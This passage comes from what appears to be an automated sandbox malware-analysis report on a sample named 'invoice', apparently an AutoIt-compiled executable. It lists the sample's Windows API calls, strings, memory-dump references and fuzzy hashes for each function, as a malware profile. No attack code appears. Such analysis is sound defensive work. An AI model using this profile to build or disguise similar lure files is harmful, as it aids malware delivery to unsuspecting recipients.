                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00FBE382,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00FDFC10
                        • LoadStringW.USER32(00000000,?,00FBE382,00000001), ref: 00FDFC19
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                        • GetModuleHandleW.KERNEL32(00000000,01045310,?,00000FFF,?,?,00FBE382,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00FDFC3B
                        • LoadStringW.USER32(00000000,?,00FBE382,00000001), ref: 00FDFC3E
                        • __swprintf.LIBCMT ref: 00FDFC8E
                        • __swprintf.LIBCMT ref: 00FDFC9F
                        • _wprintf.LIBCMT ref: 00FDFD48
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FDFD5F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                        • API String ID: 984253442-2268648507
                        • Opcode ID: 47066d89ebf7ac64a9d8372fa12063304a7b87b0f5634e2bac8598ec069d3b39
                        • Instruction ID: be34a7d5c5bf0213e0029d09ced5af396488d6188d11acf339e766b4e0d8e2b4
                        • Opcode Fuzzy Hash: 47066d89ebf7ac64a9d8372fa12063304a7b87b0f5634e2bac8598ec069d3b39
                        • Instruction Fuzzy Hash: 56415072804209ABCF15FBE1CD86EEEB779AF14700F240165F50676091DB39AF09EBA0
                        Function 00FBAA4B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                        • String ID:
                        • API String ID: 884005220-0
                        • Opcode ID: 0da1b9af53ff8b04a44514167fa6b28159ab40532a99f7f879f00b963d87933e
                        • Instruction ID: c33129dc71202716fa5c57933fb85563a68dec81f2b14f0fd437c06ba829246e
                        • Opcode Fuzzy Hash: 0da1b9af53ff8b04a44514167fa6b28159ab40532a99f7f879f00b963d87933e
                        • Instruction Fuzzy Hash: 7961F7B2900211EFD720AF26DD417EA7BA8FF41770F20811AE8519B191EB7DD941EF62
                        Function 0100BA67 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0100BA8A
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0100BAA1
                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0100BAAC
                        • CloseHandle.KERNEL32(00000000), ref: 0100BAB9
                        • GlobalLock.KERNEL32(00000000), ref: 0100BAC2
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0100BAD1
                        • GlobalUnlock.KERNEL32(00000000), ref: 0100BADA
                        • CloseHandle.KERNEL32(00000000), ref: 0100BAE1
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0100BAF2
                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,01012CAC,?), ref: 0100BB0B
                        • GlobalFree.KERNEL32(00000000), ref: 0100BB1B
                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 0100BB3F
                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0100BB6A
                        • DeleteObject.GDI32(00000000), ref: 0100BB92
                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0100BBA8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                        • String ID:
                        • API String ID: 3840717409-0
                        • Opcode ID: e85eef54a80048097ea0f22f7aa399b976b89817d991facab4b57a1f70a9182e
                        • Instruction ID: 1bfcd0f8ea66e6b035caa0501499a98c99a2f48a5fc020e8048c86c604e46b59
                        • Opcode Fuzzy Hash: e85eef54a80048097ea0f22f7aa399b976b89817d991facab4b57a1f70a9182e
                        • Instruction Fuzzy Hash: 98416B38600209BFEB32DF69DC88EAA7BB8FF8A711F104058F985D7294D7759941DB20
                        Function 00FED925 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                        Download Yara Rule
                        APIs
                        • __wsplitpath.LIBCMT ref: 00FEDA9C
                        • _wcscat.LIBCMT ref: 00FEDAB4
                        • _wcscat.LIBCMT ref: 00FEDAC6
                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FEDADB
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00FEDAEF
                        • GetFileAttributesW.KERNEL32(?), ref: 00FEDB07
                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00FEDB21
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00FEDB33
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                        • String ID: *.*
                        • API String ID: 34673085-438819550
                        • Opcode ID: 722c97110cf050dfd889b829de43497000a7e799367c344a44f056c254bd808e
                        • Instruction ID: 0f3d1ba0b4c46d57b71bc06dc0bc2c88ebacf29a824dd15d67fe3561c4cd14e1
                        • Opcode Fuzzy Hash: 722c97110cf050dfd889b829de43497000a7e799367c344a44f056c254bd808e
                        • Instruction Fuzzy Hash: F081A8729082819FCB24EF55C84496EB7E8FF85710F18482EF485D7652E738DE44EB52
                        Function 0100C216 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0100C266
                        • GetFocus.USER32 ref: 0100C276
                        • GetDlgCtrlID.USER32(00000000), ref: 0100C281
                        • _memset.LIBCMT ref: 0100C3AC
                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0100C3D7
                        • GetMenuItemCount.USER32(?), ref: 0100C3F7
                        • GetMenuItemID.USER32(?,00000000), ref: 0100C40A
                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0100C43E
                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0100C486
                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0100C4BE
                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0100C4F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                        • String ID: 0
                        • API String ID: 1296962147-4108050209
                        • Opcode ID: 321b6b03b1778176b0485e790ae9f3d7c7b8405e1a45b2b6f2f56ff2f17c044f
                        • Instruction ID: 3a23e9bd0e15a2999b5c313436bb8a9999c023254bc78de99abf579794d136f9
                        • Opcode Fuzzy Hash: 321b6b03b1778176b0485e790ae9f3d7c7b8405e1a45b2b6f2f56ff2f17c044f
                        • Instruction Fuzzy Hash: 54817E711083019FF762DF18DA84A6B7BE8FB88314F0146ADF9D597291CB31D905DB92
                        Function 00FF742F Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetDC.USER32(00000000), ref: 00FF74A4
                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00FF74B0
                        • CreateCompatibleDC.GDI32(?), ref: 00FF74BC
                        • SelectObject.GDI32(00000000,?), ref: 00FF74C9
                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00FF751D
                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00FF7559
                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00FF757D
                        • SelectObject.GDI32(00000006,?), ref: 00FF7585
                        • DeleteObject.GDI32(?), ref: 00FF758E
                        • DeleteDC.GDI32(00000006), ref: 00FF7595
                        • ReleaseDC.USER32(00000000,?), ref: 00FF75A0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                        • String ID: (
                        • API String ID: 2598888154-3887548279
                        • Opcode ID: a532db2ed1cc2c103c32368f8fe9dc64d81e509877c8217dba104a1985d7b97f
                        • Instruction ID: 02b773e1525cac0fb0b91b64b12f413ea57015350e495d4495e4a0a3f79355cf
                        • Opcode Fuzzy Hash: a532db2ed1cc2c103c32368f8fe9dc64d81e509877c8217dba104a1985d7b97f
                        • Instruction Fuzzy Hash: E4514B75904309EFCB25DFA8DC85EAEBBB9EF48310F14841DFA9997220D735A940DB60
                        Function 00F86BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FA0AD7: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00F86C6C,?,00008000), ref: 00FA0AF3
                          • Part of subcall function 00F848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F848A1,?,?,00F837C0,?), ref: 00F848CE
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F86D0D
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F86E5A
                          • Part of subcall function 00F859CD: _wcscpy.LIBCMT ref: 00F85A05
                          • Part of subcall function 00FA37BD: _iswctype.LIBCMT ref: 00FA37C5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                        • API String ID: 537147316-1018226102
                        • Opcode ID: cb2e17a8907e9bf4c8e5e363bcf2abc042c20b366e7c87e8a0b1b4b7d0fc441e
                        • Instruction ID: 8b09422b359d09e3a24143092dcff20176f7ffb2f125800780d81c82a7e04178
                        • Opcode Fuzzy Hash: cb2e17a8907e9bf4c8e5e363bcf2abc042c20b366e7c87e8a0b1b4b7d0fc441e
                        • Instruction Fuzzy Hash: 0402B8715083419FC724EF20C881AEFBBE5EF99314F14491DF48A972A1DB38E949EB42
                        Function 00F845DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00F845F9
                        • GetMenuItemCount.USER32(01045890), ref: 00FBD6FD
                        • GetMenuItemCount.USER32(01045890), ref: 00FBD7AD
                        • GetCursorPos.USER32(?), ref: 00FBD7F1
                        • SetForegroundWindow.USER32(00000000), ref: 00FBD7FA
                        • TrackPopupMenuEx.USER32(01045890,00000000,?,00000000,00000000,00000000), ref: 00FBD80D
                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FBD819
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                        • String ID:
                        • API String ID: 2751501086-0
                        • Opcode ID: 2c4d489640a0b12fe8d946846be56f9d6bb51283ee3c46340ddffb94bedfdc9e
                        • Instruction ID: ba851408580aaa2bbaf152d53b7199e0dac5da46f920f34876096f8aa239bd77
                        • Opcode Fuzzy Hash: 2c4d489640a0b12fe8d946846be56f9d6bb51283ee3c46340ddffb94bedfdc9e
                        • Instruction Fuzzy Hash: C471E371A0021ABFEB319F16DC45FEAFF69FB05364F240216F518A61D0D7B66810EB91
                        Function 01000EA5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FFFE38,?,?), ref: 01000EBC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: BuffCharUpper
                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                        • API String ID: 3964851224-909552448
                        • Opcode ID: 8228a73dd565cd172bae1fb1213e2762539e1e357ca5155fa87db4c60f5a775d
                        • Instruction ID: fe6242044c4fd88d684fd5aaa25b2b7d308a397fc454a554ae248358a21f150d
                        • Opcode Fuzzy Hash: 8228a73dd565cd172bae1fb1213e2762539e1e357ca5155fa87db4c60f5a775d
                        • Instruction Fuzzy Hash: 1F418D7020028A8BEF12EF14EC91AEE3764BF46354F144458FCD15B296DFB9D919EB60
                        Function 00FDFAD2 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00FBE5F9,00000010,?,Bad directive syntax error,0100F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00FDFAF3
                        • LoadStringW.USER32(00000000,?,00FBE5F9,00000010), ref: 00FDFAFA
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                        • _wprintf.LIBCMT ref: 00FDFB2D
                        • __swprintf.LIBCMT ref: 00FDFB4F
                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00FDFBBE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                        • API String ID: 1506413516-4153970271
                        • Opcode ID: b925ae12e841e5e02a8d259e0bd80672067f5418812372957bb131fdbdca7302
                        • Instruction ID: 9de038a710f62e8616418e1599e537aa63cc30afb73d0c6347aa0d16aadce9e8
                        • Opcode Fuzzy Hash: b925ae12e841e5e02a8d259e0bd80672067f5418812372957bb131fdbdca7302
                        • Instruction Fuzzy Hash: 6021607284031AABCF22FFA0CC56FEE7779BF18700F04449AF51566061DB79AA58EB50
                        Function 00FE536E Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                          • Part of subcall function 00F87A84: _memmove.LIBCMT ref: 00F87B0D
                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00FE53D7
                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00FE53ED
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FE53FE
                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00FE5410
                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00FE5421
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: SendString$_memmove
                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                        • API String ID: 2279737902-1007645807
                        • Opcode ID: 42f0f29280679e25f9d318e6d9c9a483afb1992407b9f5b4d09618ee8c039faf
                        • Instruction ID: 2ed5f0a8dba5704c0fe0d49262a33fa83a8fa5c7627098e43a6df133ca865e75
                        • Opcode Fuzzy Hash: 42f0f29280679e25f9d318e6d9c9a483afb1992407b9f5b4d09618ee8c039faf
                        • Instruction Fuzzy Hash: DD11E221A502697AD720F662CC8AEFFBA7CFBD5F40F00456AB401A60D1DA649E44DAA0
                        Function 00FE46F8 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                        • String ID: 0.0.0.0
                        • API String ID: 208665112-3771769585
                        • Opcode ID: 8c243c192587257629153202b7d028770acfc17c36c295437d724added67373c
                        • Instruction ID: b699e3b0b54dd2d12da21842aa29fc17f733aae002cfdd8102813fb07d031b6e
                        • Opcode Fuzzy Hash: 8c243c192587257629153202b7d028770acfc17c36c295437d724added67373c
                        • Instruction Fuzzy Hash: 25113A71A041156FCB31AB25EC4AEDA77BCEF43721F0401AAF445D6081EF79AA81B791
                        Function 00FE501C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • timeGetTime.WINMM ref: 00FE5021
                          • Part of subcall function 00FA034A: timeGetTime.WINMM(?,75C0B400,00F90FDB), ref: 00FA034E
                        • Sleep.KERNEL32(0000000A), ref: 00FE504D
                        • EnumThreadWindows.USER32(?,Function_00064FCF,00000000), ref: 00FE5071
                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00FE5093
                        • SetActiveWindow.USER32 ref: 00FE50B2
                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00FE50C0
                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00FE50DF
                        • Sleep.KERNEL32(000000FA), ref: 00FE50EA
                        • IsWindow.USER32 ref: 00FE50F6
                        • EndDialog.USER32(00000000), ref: 00FE5107
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                        • String ID: BUTTON
                        • API String ID: 1194449130-3405671355
                        • Opcode ID: 84cc3b0df3e0ae5050617d76f75b5237c7b239cdfb9844fb1d61df0c8100dcba
                        • Instruction ID: 44e5b77be8e0643f4bbff8d4b7ebe1eceb92aa0cfe8e2279e141b09ac9d35e95
                        • Opcode Fuzzy Hash: 84cc3b0df3e0ae5050617d76f75b5237c7b239cdfb9844fb1d61df0c8100dcba
                        • Instruction Fuzzy Hash: 7721C6B4600746AFE7315F31EEC8F653B69E74A799F041018F18182198EB6F9D40B7A2
                        Function 00FED619 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                        • CoInitialize.OLE32(00000000), ref: 00FED676
                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00FED709
                        • SHGetDesktopFolder.SHELL32(?), ref: 00FED71D
                        • CoCreateInstance.OLE32(01012D7C,00000000,00000001,01038C1C,?), ref: 00FED769
                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00FED7D8
                        • CoTaskMemFree.OLE32(?,?), ref: 00FED830
                        • _memset.LIBCMT ref: 00FED86D
                        • SHBrowseForFolderW.SHELL32(?), ref: 00FED8A9
                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00FED8CC
                        • CoTaskMemFree.OLE32(00000000), ref: 00FED8D3
                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00FED90A
                        • CoUninitialize.OLE32(00000001,00000000), ref: 00FED90C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
